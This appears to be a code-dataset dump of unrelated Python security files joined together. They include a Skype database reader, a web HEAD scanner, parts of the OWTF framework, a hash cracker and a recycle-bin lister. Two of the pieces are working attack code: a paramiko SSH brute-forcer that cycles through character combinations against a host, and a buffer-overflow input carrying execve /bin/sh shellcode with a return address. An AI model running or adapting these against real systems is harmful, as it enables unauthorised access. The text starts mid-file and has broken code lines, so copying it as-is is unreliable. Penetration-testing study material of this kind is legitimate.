' | Partner: '+ str(row[1])
def printMessages(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT datetime(timestamp,'unixepoch'), \
dialog_partner, author, body_xml FROM Messages;")
print '\n[*] -- Found Messages --'
for row in c:
try:
if 'partlist' not in str(row[3]):
if str(row[1]) != str(row[2]):
msgDirection = 'To ' + str(row[1]) + ': '
else:
msgDirection = 'From ' + str(row[2]) + ' : '
print 'Time: ' + str(row[0]) + ' ' \
+ msgDirection + str(row[3])
except:
pass
def main():
parser = optparse.OptionParser("usage %prog "+\
"-p <skype profile path> ")
parser.add_option('-p', dest='pathName', type='string',\
help='specify skype profile path')
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
elif os.path.isdir(pathName) == False:
print '[!] Path Does Not Exist: ' + pathName
exit(0)
else:
skypeDB = os.path.join(pathName, 'main.db')
if os.path.isfile(skypeDB):
printProfile(skypeDB)
printContacts(skypeDB)
printCallLog(skypeDB)
printMessages(skypeDB)
else:
print '[!] Skype Database '+\
'does not exist: ' + skpeDB
if __name__ == '__main__':
main()
| 29.201923 | 65 | 0.515924 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: April 2015
Name: headrequest.py
Purpose: To identify live web applications out extensive IP ranges
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import urllib2, argparse, sys
def host_test(filename):
file = "headrequests.log"
bufsize = 0
e = open(file, 'a', bufsize)
print("[*] Reading file %s") % (file)
with open(filename) as f:
hostlist = f.readlines()
for host in hostlist:
print("[*] Testing %s") % (str(host))
target = "http://" + host
target_secure = "https://" + host
try:
request = urllib2.Request(target)
request.get_method = lambda : 'HEAD'
response = urllib2.urlopen(request)
except:
print("[-] No web server at %s") % (str(target))
response = None
if response != None:
print("[*] Response from %s") % (str(target))
print(response.info())
details = response.info()
e.write(str(details))
try:
request_secure = urllib2.urlopen(target_secure)
request_secure.get_method = lambda : 'HEAD'
response_secure = urllib2.urlopen(request_secure)
except:
print("[-] No web server at %s") % (str(target_secure))
response_secure = None
if response_secure != None:
print("[*] Response from %s") % (str(target_secure))
print(response_secure.info())
details = response_secure.info()
e.write(str(details))
e.close()
def main():
# If script is executed at the CLI
usage = '''usage: %(prog)s [-t hostfile] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-t", action="store", dest="targets", default=None, help="Filename for hosts to test")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if (args.targets == None):
parser.print_help()
sys.exit(1)
# Set Constructors
verbose = args.verbose # Verbosity level
targets = args.targets # Password or hash to test against default is admin
host_test(targets)
if __name__ == '__main__':
main()
| 41.354167 | 151 | 0.666667 |
owtf | """
tests.functional.cli.test_nowebui
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from tests.owtftest import OWTFCliTestCase
class OWTFCliNoWebUITest(OWTFCliTestCase):
categories = ["cli", "fast"]
def test_cli_no_webui(self):
"""Run OWTF without its Web UI."""
self.run_owtf()
self.assert_has_not_been_logged(
"Starting web server at http://127.0.0.1:8009",
name="MainProcess",
msg="The web UI should not have been run!",
)
self.assert_is_in_logs(
"MainProcess: caught signal SIGINT, exiting",
name="MainProcess",
msg="OWTF did not finish properly!",
)
| 25.192308 | 59 | 0.554412 |
owtf | """
owtf.requester.base
~~~~~~~~~~~~~~~~~~~
The Requester module is in charge of simplifying HTTP requests and
automatically log HTTP transactions by calling the DB module.
"""
import logging
import sys
try:
import http.client as client
except ImportError:
import httplib as client
try:
from urllib.parse import urlparse, urlencode
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
from urllib.request import (
HTTPHandler,
HTTPSHandler,
HTTPRedirectHandler,
ProxyHandler,
build_opener,
install_opener,
)
except ImportError:
from urlparse import urlparse
from urllib import urlencode
from urllib2 import (
urlopen,
Request,
HTTPError,
HTTPHandler,
HTTPSHandler,
HTTPRedirectHandler,
ProxyHandler,
build_opener,
install_opener,
URLError,
)
from owtf.db.session import get_scoped_session
from owtf.transactions.base import HTTPTransaction
from owtf.managers.target import is_url_in_scope
from owtf.managers.transaction import get_first, is_transaction_already_added
from owtf.managers.url import is_url
from owtf.plugin.runner import runner
from owtf.settings import PROXY_CHECK_URL, USER_AGENT, INBOUND_PROXY_IP, INBOUND_PROXY_PORT
from owtf.utils.http import derive_http_method
from owtf.utils.strings import str_to_dict
from owtf.utils.timer import timer
from owtf.utils.error import abort_framework
__all__ = ["requester"]
# Intercept raw request trick from:
# http://stackoverflow.com/questions/6085709/get-headers-sent-in-urllib2-http-request
class _HTTPConnection(client.HTTPConnection):
def send(self, s):
global raw_request
# Saving to global variable for Requester class to see.
raw_request.append(s)
client.HTTPConnection.send(self, s)
class _HTTPHandler(HTTPHandler):
def http_open(self, req):
try:
return self.do_open(_HTTPConnection, req)
except KeyboardInterrupt:
raise KeyboardInterrupt # Not handled here.
except Exception:
# Can't have OWTF crash due to a library exception -i.e. raise BadStatusLine(line)-
return ""
class _HTTPSConnection(client.HTTPSConnection):
def send(self, s):
global raw_request
# Saving to global variable for Requester class to see.
raw_request.append(s)
client.HTTPSConnection.send(self, s)
class _HTTPSHandler(HTTPSHandler):
def https_open(self, req):
try:
return self.do_open(_HTTPSConnection, req)
except KeyboardInterrupt:
raise KeyboardInterrupt # Not handled here.
except Exception:
# Can't have OWTF crash due to a library exception -i.e. raise BadStatusLine(line)-.
return ""
# SmartRedirectHandler is courtesy of:
# http://www.diveintopython.net/http_web_services/redirects.html
class SmartRedirectHandler(HTTPRedirectHandler):
def http_error_301(self, req, fp, code, msg, headers):
result = HTTPRedirectHandler.http_error_301(self, req, fp, code, msg, headers)
result.status = code
return result
def http_error_302(self, req, fp, code, msg, headers):
result = HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
result.status = code
return result
class Requester(object):
def __init__(self, proxy):
self.http_transaction = None
self.headers = {"User-Agent": USER_AGENT}
self.req_count_refused = 0
self.req_count_total = 0
self.log_transactions = False
self.timer = timer
self.session = get_scoped_session()
self.proxy = proxy
if proxy is None:
logging.debug(
"WARNING: No outbound proxy selected. It is recommended to "
"use an outbound proxy for tactical fuzzing later"
)
self.opener = build_opener(_HTTPHandler, _HTTPSHandler, SmartRedirectHandler)
else: # All requests must use the outbound proxy.
logging.debug("Setting up proxy(inbound) for OWTF requests..")
ip, port = proxy
proxy_conf = {"http": "http://{!s}:{!s}".format(ip, port), "https": "http://{!s}:{!s}".format(ip, port)}
proxy_handler = ProxyHandler(proxy_conf)
# FIXME: Works except no raw request on https.
self.opener = build_opener(proxy_handler, _HTTPHandler, _HTTPSHandler, SmartRedirectHandler)
install_opener(self.opener)
def is_transaction_added(self, url):
"""Checks if the transaction has already been added
:param url: URL of the transaction
:type url: `str`
:return: True/False
:rtype: `bool`
"""
return is_transaction_already_added(self.session, {"url": url.strip()})
def is_request_possible(self):
"""Check if requests are possible
:return: True if yes, else False
:rtype: `bool`
"""
return runner.requests_possible()
def proxy_check(self):
"""Checks if the target URL can be accessed through proxy
.. note::
Verify proxy works! www.google.com might not work in a restricted network, try target URL :)
:return: Result of the check
:rtype: `list`
"""
if self.proxy is not None and self.is_request_possible():
url = PROXY_CHECK_URL
refused_before = self.req_count_refused
logging.info("Proxy Check: Avoid logging request again if already in DB..")
log_setting_backup = False
if self.is_transaction_added(url):
log_setting_backup = not self.log_transactions
if log_setting_backup:
self.log_transactions = True
refused_after = self.req_count_refused
if refused_before < refused_after: # Proxy is refusing connections.
return [False, "ERROR: Proxy Check error: The proxy is not listening or is refusing connections"]
else:
return [True, "Proxy Check OK: The proxy appears to be working"]
return [True, "Proxy Check OK: No proxy is setup or no HTTP requests will be made"]
def get_headers(self):
"""Get headers
:return: Headers
:rtype: `dict`
"""
return self.headers
def set_headers(self, headers):
"""Set supplied headers
:param headers: Headers to set
:type headers: `dict`
:return: None
:rtype: None
"""
self.headers = headers
def set_header(self, header, value):
"""Set the value of header
:param header: Header key
:type header: `str`
:param value: Value to be set
:type value: `str`
:return: None
:rtype: None
"""
self.headers[header] = value
def get_post_to_str(self, post=None):
"""Convert POST req to str
:param post: POST request
:type post:
:return: Resultant string
:rtype: `str`
"""
post = self.get_post(post)
if post is None:
return ""
return post
def get_post(self, post=None):
"""Get post request
:param post: Post request
:type post: `str`
:return: Processed POST request
:rtype: `str`
"""
if "" == post:
post = None
if post:
if isinstance(post, str) or isinstance(post, unicode):
# Must be a dictionary prior to urlencode.
post = str_to_dict(str(post))
post = urlencode(post).encode("utf-8")
return post
def perform_request(self, request):
"""Send the request
:param request: Request to send
:type request:
:return: None
:rtype: None
"""
return urlopen(request)
def set_successful_transaction(self, raw_request, response):
"""Set a transaction from request and response
:param raw_request: Raw request
:type raw_request: `list`
:param response: response
:type response:
:return: None
:rtype: None
"""
return self.http_transaction.set_transaction(True, raw_request[0], response)
def log_transaction(self):
"""Log a transaction
:return: None
:rtype: None
"""
self.http_transaction.log_transaction(self.http_transaction)
def request(self, url, method=None, post=None):
"""Main request function
:param url: Target URL
:type url: `str`
:param method: Method for the request
:type method: `str`
:param post: Post body
:type post: `str` or None
:return:
:rtype:
"""
# kludge: necessary to get around urllib2 limitations: Need this to get the exact request that was sent.
global raw_request
url = str(url)
raw_request = [] # initialize raw request to blank list.
post = self.get_post(post)
method = derive_http_method(method, post)
url = url.strip() # Clean up URL.
r = Request(url, post, self.headers) # GET request.
if method is not None:
# kludge: necessary to do anything other that GET or POST with urllib2
r.get_method = lambda: method
# MUST create a new Transaction object each time so that lists of
# transactions can be created and process at plugin-level
# Pass the timer object to avoid instantiating each time.
self.http_transaction = HTTPTransaction(self.timer)
self.http_transaction.start(url, post, method, is_url_in_scope(url))
self.req_count_total += 1
try:
response = self.perform_request(r)
self.set_successful_transaction(raw_request, response)
except HTTPError as error: # page NOT found.
# Error is really a response for anything other than 200 OK in urllib2 :)
self.http_transaction.set_transaction(False, raw_request[0], error)
except URLError as error: # Connection refused?
err_message = self.process_http_error_code(error, url)
self.http_transaction.set_error(err_message)
except IOError:
err_message = "ERROR: Requester Object -> Unknown HTTP Request error: {!s}\n{!s}".format(
url, str(sys.exc_info())
)
self.http_transaction.set_error(err_message)
if self.log_transactions:
# Log transaction in DB for analysis later and return modified Transaction with ID.
self.log_transaction()
return self.http_transaction
def process_http_error_code(self, error, url):
"""Process HTTP error code
:param error: Error
:type error:
:param url: Target URL
:type url: `str`
:return: Message
:rtype: `str`
"""
message = ""
if str(error.reason).startswith("[Errno 111]"):
message = "ERROR: The connection was refused!: {!s}".format(error)
self.req_count_refused += 1
elif str(error.reason).startswith("[Errno -2]"):
abort_framework("ERROR: cannot resolve hostname!: {!s}".format(error))
else:
message = "ERROR: The connection was not refused, unknown error!"
log = logging.getLogger("general")
log.info(message)
return "{!s} (Requester Object): {!s}\n{!s}".format(message, url, str(sys.exc_info()))
def get(self, url):
"""Wrapper for get requests
:param url: Target url
:type url: `str`
:return:
:rtype:
"""
return self.request(url)
def post(self, url, data):
"""Wrapper for Post requests
:param url: Target url
:type url: `str`
:param data: Post data
:type data: `str`
:return:
:rtype:
"""
return self.request(url, "POST", data)
def trace(self, url):
"""Wrapper for trace requests
:param url: Target url
:type url: `str`
:return:
:rtype:
"""
return self.request(url, "TRACE", None)
def options(self, url):
"""Wrapper for options requests
:param url: Target url
:type url: `str`
:return:
:rtype:
"""
return self.request(url, "OPTIONS", None)
def head(self, url):
"""Wrapper for head requests
:param url: Target url
:type url: `str`
:return:
:rtype:
"""
return self.request(url, "HEAD", None)
def debug(self, url):
"""Debug request
:param url: Target url
:type url: `str`
:return:
:rtype:
"""
self.backup_headers()
self.headers["Command"] = "start-debug"
result = self.request(url, "DEBUG", None)
self.restore_headers()
return result
def put(self, url, content_type="text/plain"):
"""Wrapper for put requests
:param url: Target url
:type url: `str`
:param content_type: Content Type
:type content_type: `str`
:return:
:rtype:
"""
self.backup_headers()
self.headers["Content-Type"] = content_type
self.headers["Content-Length"] = "0"
result = self.request(url, "PUT", None)
self.restore_headers()
return result
def backup_headers(self):
"""Backup headers
:return: None
:rtype: None
"""
self.headers_backup = dict.copy(self.headers)
def restore_headers(self):
"""Restore headers
:return: None
:rtype: None
"""
self.headers = dict.copy(self.headers_backup)
def get_transaction(self, use_cache, url, method=None, data=None):
"""Get transaction from request, response
:param use_cache: Cache usage
:type use_cache: `bool`
:param url: Request URL
:type url: `str`
:param method: Request method
:type method: `str`
:param data: Request data
:type data: `str`
:return:
:rtype:
"""
criteria = {"url": url.strip()}
if method is not None:
criteria["method"] = method
# Must clean-up data to ensure match is found.
if data is not None:
criteria["data"] = self.get_post_to_str(data)
# Visit URL if not already visited.
if not use_cache or not is_transaction_already_added(self.session, criteria):
if method in ["", "GET", "POST", "HEAD", "TRACE", "OPTIONS"]:
return self.request(url, method, data)
elif method == "DEBUG":
return self.debug(url)
elif method == "PUT":
return self.put(url, data)
else: # Retrieve from DB = faster.
# Important since there is no transaction ID with transactions objects created by Requester.
return get_first(self.session, criteria)
def get_transactions(self, use_cache, url_list, method=None, data=None, unique=True):
"""Get transaction from request, response
:param use_cache: Cache usage
:type use_cache: `bool`
:param url_list: List of request URLs
:type url_list: `list`
:param method: Request method
:type method: `str`
:param data: Request data
:type data: `str`
:param unique: Unique or not
:type unique: `bool`
:return: List of transactions
:rtype: `list`
"""
transactions = []
if unique:
url_list = set(url_list)
for url in url_list:
url = url.strip() # Clean up the URL first.
if not url:
continue # Skip blank lines.
if not is_url(url):
logging.info("Minor issue: %s is not a valid URL and has been ignored, processing continues", url)
continue # Skip garbage URLs.
transaction = self.get_transaction(use_cache, url, method=method, data=data)
if transaction is not None:
transactions.append(transaction)
return transactions
requester = Requester(proxy=[INBOUND_PROXY_IP, INBOUND_PROXY_PORT])
| 31.449902 | 116 | 0.588339 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.6
import json,sys
class JsonParse():
def __init__(self,json_):
self.json=json_
def print_file(self):
json_data=""
with open(self.json,"r") as json_file:
json_data=json.loads(json_file.read())
if json_data:
print("Type of loaded File is :"+str(type(json_data)))
employee_root=json_data.get("employees",None)
if employee_root:
print("Department : " + employee_root["department"])
print("Location : " + employee_root["location"])
print("Employees : ")
for emp in employee_root["data"]:
print("\n--------------------------------")
for k,v in emp.items():
print("\t"+str(k)+" : " +str(v))
def process(self):
with open(self.json,"r") as json_file:
json_data=json.loads(json_file.read())
if json_data:
print("\nSlab Processing started")
for index,emp in enumerate(json_data["employees"]["data"]):
if emp["salary"] >= 30000:
json_data["employees"]["data"][index]["slab"]="A"
else:
json_data["employees"]["data"][index]["slab"]="B"
print("Slab Processing Ended \nSaving Results :")
with open(self.json,"w") as json_file:
json.dump(json_data, json_file , indent=4, sort_keys=True)
print("Results saved \nNow reprinting : ")
self.print_file()
obj=JsonParse(sys.argv[1])
obj.print_file()
obj.process()
| 32.717949 | 62 | 0.620244 |
owtf | """
ACTIVE Plugin for Generic Unauthenticated Web App Fuzzing via Skipfish
This will perform a "low-hanging-fruit" pass on the web app for easy to find (tool-findable) vulns
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Active Vulnerability Scanning without credentials via Skipfish"
def run(PluginInfo):
resource = get_resources("Skipfish_Unauth")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 35.642857 | 98 | 0.777344 |
Ethical-Hacking-Scripts | import hashlib, threading, time, sys
from optparse import OptionParser
from string import ascii_letters, digits, punctuation
from itertools import product
class Hashcracker:
def __init__(self, hash ,hashType, passfile, nofile, passdigits, combolist):
self.start = time.time()
self.hash = hash
self.stop = False
self.logo()
self.combolist = combolist
self.nofile = nofile
self.passdigits = passdigits
try:
self.passlist = open(passfile, 'r')
except:
if not self.nofile:
print("[+] Password list provided is invalid.")
sys.exit()
self.checked = 0
if "md5" in hashType:
self.hashtype = hashlib.md5
elif "sha1" in hashType:
self.hashtype = hashlib.sha1
elif "sha224" in hashType:
self.hashtype = hashlib.sha224
elif "sha256" in hashType:
self.hashtype = hashlib.sha256
elif "sha384" in hashType:
self.hashtype = hashlib.sha384
elif "sha512" in hashType:
self.hashtype = hashlib.sha512
else:
print("[+] Invalid hashing method.")
sys.exit()
if self.nofile:
print("[+] The hash cracking may take time, depending on the length of the password.")
self.crackit = threading.Thread(target=self.nofile_cracker)
else:
self.crackit = threading.Thread(target=self.cracker)
self.crackit.start()
def save_hash(self,hash,realdef):
file = open(hash+".txt","w")
file.write(f"{hash}:{realdef}")
file.close()
def logo(self):
print("""
___ ___ .__ _________ .__ .___ ________ _______
/ | \_____ _____| |__ / _____/ ________ __|__| __| _/ ___ _\_____ \ \ _ \
/ ~ \__ \ / ___/ | \ \_____ \ / ____/ | \ |/ __ | \ \/ // ____/ / /_\ \
\ Y // __ \_\___ \| Y \/ < <_| | | / / /_/ | \ // \ \ \_/ \\
\___|_ /(____ /____ >___| /_______ /\__ |____/|__\____ | \_/ \_______ \ /\ \_____ /
\/ \/ \/ \/ \/ |__| \/ \/ \/ \/
Hash-Cracker by DrSquid""")
def display_packet(self, hash, string):
end = time.time()
return f"""[!] Hash has been cracked!
[!] Hash: {hash} String: {string.strip()}
[!] Passwords checked: {self.checked}
[!] Time elapsed: {end - self.start}"""
def nofile_cracker(self):
success = False
for passcode in product(self.combolist, repeat=self.passdigits):
new_passcode = ""
for i in passcode:
new_passcode += i
if str(self.hashtype(new_passcode.encode()).hexdigest()) == self.hash:
success = True
print(self.display_packet(self.hash, new_passcode))
self.save_hash(self.hash,new_passcode)
input("[!] Press enter to exit.")
break
else:
self.checked += 1
if not success:
print(f"[?] Unable to crack Hash: {self.hash}")
def cracker(self):
success = False
while True:
try:
for line in self.passlist:
if self.hashtype(line.strip().encode()).hexdigest() == self.hash:
print(self.display_packet(self.hash, line.strip()))
self.save_hash(self.hash,line.strip())
success = True
input("[!] Press enter to exit.")
break
else:
self.checked += 1
if not success:
print(f"[?] Unable to crack Hash: {self.hash}")
break
except Exception as e:
pass
class OptionParse:
def __init__(self):
if len(sys.argv) < 3:
self.usage()
else:
self.get_args()
def usage(self):
Hashcracker.logo(None)
print("""
[+] Option-Parsing Help:
[+] --h, --hash - Specifies the Hash to crack.
[+] --hT, --hashtype - Specifies Hash type(default is md5).
[+] With Brute Force File:
[+] --pL, --passlist - Specifies the Brute Forcing TxT File.
[+] Without Brute Force File:
[+] --nF, --nofile - Makes the script use computing power rather than a txt file to crack a hash.
[+] --pD, --passdigits - Specify the amount of digits the password contains(default is 6).
[+] --oL, --onlyletters - Makes the no file brute forcing brute force through only letter passwords.
[+] --oN, --onlynumbers - Makes the no file brute forcing brute force through only number passwords.
[+] Optional Arguements:
[+] --i, --info - Shows this message.
[+] Usage:""")
if sys.argv[0].endswith(".py"):
print("[+] python3 HashSquid.py --h <hash> --hT <hashtype> --pL <passlist>")
print("[+] python3 HashSquid.py --i")
else:
print("[+] HashSquid --h <hash> --hT <hashtype> --pL <passlist>")
print("[+] HashSquid --i")
def get_args(self):
self.opts = OptionParser()
self.opts.add_option("--h","--hash",dest="hash")
self.opts.add_option("--hT","--hashtype",dest="hashtype")
self.opts.add_option("--pL","--passlist",dest="passlist")
self.opts.add_option("--nF","--nofile",dest="nofile", action="store_true")
self.opts.add_option("--pD","--passdigits",dest="passdigits")
self.opts.add_option("--oL","--onlyletters",dest="onlyletters", action="store_true")
self.opts.add_option("--oN","--onlynumbers",dest="onlynumbers", action="store_true")
self.opts.add_option("--i","--info",dest="info",action="store_true")
args, opt = self.opts.parse_args()
nofile = False
if args.info is not None:
self.usage()
else:
pass
if args.hash is None:
self.usage()
else:
hash = args.hash
if args.hashtype is None:
hashtype = "md5"
else:
hashtype = args.hashtype
if args.nofile is not None:
nofile = True
if args.passdigits is not None:
try:
passdigits = int(args.passdigits)
except:
passdigits = 6
else:
if nofile:
passdigits = 6
if args.onlyletters is not None:
combolist = ascii_letters
elif args.onlynumbers is not None:
combolist = digits
else:
combolist = ascii_letters+digits+punctuation
if args.passlist is None:
if not nofile:
self.usage()
else:
passlist = None
else:
passlist = args.passlist
HashSquid = Hashcracker(hash, hashtype, passlist, nofile, passdigits, combolist)
optionparser = OptionParse()
| 40.090909 | 103 | 0.486931 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import optparse
from _winreg import *
def sid2user(sid):
try:
key = OpenKey(HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList"
+ '\\' + sid)
(value, type) = QueryValueEx(key, 'ProfileImagePath')
user = value.split('\\')[-1]
return user
except:
return sid
def returnDir():
dirs=['C:\\Recycler\\','C:\\Recycled\\','C:\\$Recycle.Bin\\']
for recycleDir in dirs:
if os.path.isdir(recycleDir):
return recycleDir
return None
def findRecycled(recycleDir):
dirList = os.listdir(recycleDir)
for sid in dirList:
files = os.listdir(recycleDir + sid)
user = sid2user(sid)
print '\n[*] Listing Files For User: ' + str(user)
for file in files:
print '[+] Found File: ' + str(file)
def main():
recycledDir = returnDir()
findRecycled(recycledDir)
if __name__ == '__main__':
main()
| 21.043478 | 65 | 0.581441 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
from struct import *
buffer = ''
buffer += '\x90'*232
buffer +=
'\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x
48\x89\xe7\x50\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05'
buffer += pack("<Q", 0x7fffffffe2c0)
f = open("input.txt", "w")
f.write(buffer) | 25.818182 | 75 | 0.676871 |
Effective-Python-Penetration-Testing | from w3af_api_client import Connection, Scan
connection = Connection('http://127.0.0.1:5000/')
print connection.get_version()
profile = file('w3af/profiles/OWASP_TOP10.pw3af').read()
target = ['http://localhost']
scan = Scan(connection)
scan.start(profile, target)
scan.get_urls()
scan.get_log()
scan.get_findings()
scan.get_fuzzable_requests()
| 20.875 | 56 | 0.733524 |
cybersecurity-penetration-testing | #!/usr/bin/python
import paramiko, sys, os, socket, threading, time
import itertools,string,crypt
PASS_SIZE = 5
def bruteforce_list(charset, maxlength):
return (''.join(candidate)
for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
for i in range(1, maxlength + 1)))
def attempt(Password):
IP = "127.0.0.1"
USER = "rejah"
PORT=22
try:
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.MissingHostKeyPolicy())
try:
ssh.connect(IP , port=PORT, username=USER, password=Password)
print "Connected successfully. Password = "+Password
except paramiko.AuthenticationException, error:
print "Incorrect password: "+Password
pass
except socket.error, error:
print error
pass
except paramiko.SSHException, error:
print error
print "Most probably this is caused by a missing host key"
pass
except Exception, error:
print "Unknown error: "+error
pass
ssh.close()
except Exception,error :
print error
letters_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQSTUVWXYZ1234567890!@#$&()'
for i in bruteforce_list(letters_list, PASS_SIZE):
t = threading.Thread(target=attempt, args=(i))
t.start()
time.sleep(0.3)
sys.exit(0)
| 24.603448 | 91 | 0.618598 |
owtf | """
owtf.api.handlers.targets
~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from owtf.api.handlers.base import APIRequestHandler
from owtf.lib import exceptions
from owtf.lib.exceptions import InvalidTargetReference, APIError
from owtf.managers.target import (
add_targets,
delete_target,
get_target_config_by_id,
get_target_config_dicts,
get_targets_by_severity_count,
search_target_configs,
update_target,
)
from owtf.api.handlers.jwtauth import jwtauth
__all__ = ["TargetConfigSearchHandler", "TargetSeverityChartHandler", "TargetConfigHandler"]
@jwtauth
class TargetConfigHandler(APIRequestHandler):
"""Manage target config data."""
SUPPORTED_METHODS = ["GET", "POST", "PUT", "PATCH", "DELETE"]
def get(self, target_id=None):
"""Get target config data by id or fetch all target configs.
**Example request**:
.. sourcecode:: http
GET /api/v1/targets/2 HTTP/1.1
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
{
"status": "success",
"data": {
"top_url": "https://google.com:443",
"top_domain": "com",
"target_url": "https://google.com",
"max_user_rank": 0,
"url_scheme": "https",
"host_path": "google.com",
"ip_url": "https://172.217.10.238",
"host_ip": "172.217.10.238",
"max_owtf_rank": -1,
"port_number": "443",
"host_name": "google.com",
"alternative_ips": "['172.217.10.238']",
"scope": true,
"id": 2
}
}
"""
try:
# If no target_id, means /target is accessed with or without filters
if not target_id:
# Get all filter data here, so that it can be passed
filter_data = dict(self.request.arguments)
self.success(get_target_config_dicts(self.session, filter_data))
else:
self.success(get_target_config_by_id(self.session, target_id))
except InvalidTargetReference:
raise APIError(400, "Invalid target reference provided")
def post(self, target_id=None):
"""Add a target to the current session.
**Example request**:
.. sourcecode:: http
POST /api/v1/targets/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 201 Created
Content-Length: 0
Content-Type: application/json
{
"status": "success",
"data": null
}
"""
if (target_id) or (not self.get_argument("target_url", default=None)): # How can one post using an id xD
raise APIError(400, "Incorrect query parameters")
try:
add_targets(self.session, dict(self.request.arguments)["target_url"])
self.set_status(201) # Stands for "201 Created"
self.success(None)
except exceptions.DBIntegrityException:
raise APIError(400, "An unknown exception occurred when performing a DB operation")
except exceptions.UnresolvableTargetException:
raise APIError(400, "The target url can not be resolved")
def put(self, target_id=None):
return self.patch(target_id)
def patch(self, target_id=None):
"""Update a target.
**Example request**:
.. sourcecode:: http
PATCH /api/v1/targets/1 HTTP/1.1
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"data": null
}
"""
if not target_id or not self.request.arguments:
raise APIError(400, "Incorrect query parameters")
try:
patch_data = dict(self.request.arguments)
update_target(self.session, patch_data, id=target_id)
self.success(None)
except InvalidTargetReference:
raise APIError(400, "Invalid target reference provided")
def delete(self, target_id=None):
"""Delete a target.
**Example request**:
.. sourcecode:: http
DELETE /api/v1/targets/4 HTTP/1.1
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"data": null
}
"""
if not target_id:
raise APIError(400, "Missing target_id")
try:
delete_target(self.session, id=target_id)
self.success(None)
except InvalidTargetReference:
raise APIError(400, "Invalid target reference provided")
@jwtauth
class TargetConfigSearchHandler(APIRequestHandler):
"""Filter targets."""
SUPPORTED_METHODS = ["GET"]
def get(self):
"""Get target config data based on user filter.
**Example request**:
.. sourcecode:: http
GET /api/v1/targets/search/?limit=100&offset=0&target_url=google HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
{
"status": "success",
"data": {
"records_total": 4,
"records_filtered": 2,
"data": [
{
"top_url": "https://google.com:443",
"top_domain": "com",
"target_url": "https://google.com",
"max_user_rank": -1,
"url_scheme": "https",
"host_path": "google.com",
"ip_url": "https://172.217.10.238",
"host_ip": "172.217.10.238",
"max_owtf_rank": -1,
"port_number": "443",
"host_name": "google.com",
"alternative_ips": "['172.217.10.238']",
"scope": true,
"id": 2
},
{
"top_url": "http://google.com:80",
"top_domain": "com",
"target_url": "http://google.com",
"max_user_rank": -1,
"url_scheme": "http",
"host_path": "google.com",
"ip_url": "http://172.217.10.238",
"host_ip": "172.217.10.238",
"max_owtf_rank": -1,
"port_number": "80",
"host_name": "google.com",
"alternative_ips": "['172.217.10.238']",
"scope": true,
"id": 1
}
]
}
}
"""
try:
filter_data = dict(self.request.arguments)
filter_data["search"] = True
self.success(search_target_configs(self.session, filter_data=filter_data))
except exceptions.InvalidParameterType:
raise APIError(400, "Invalid parameter type provided")
@jwtauth
class TargetSeverityChartHandler(APIRequestHandler):
"""Get targets with severity."""
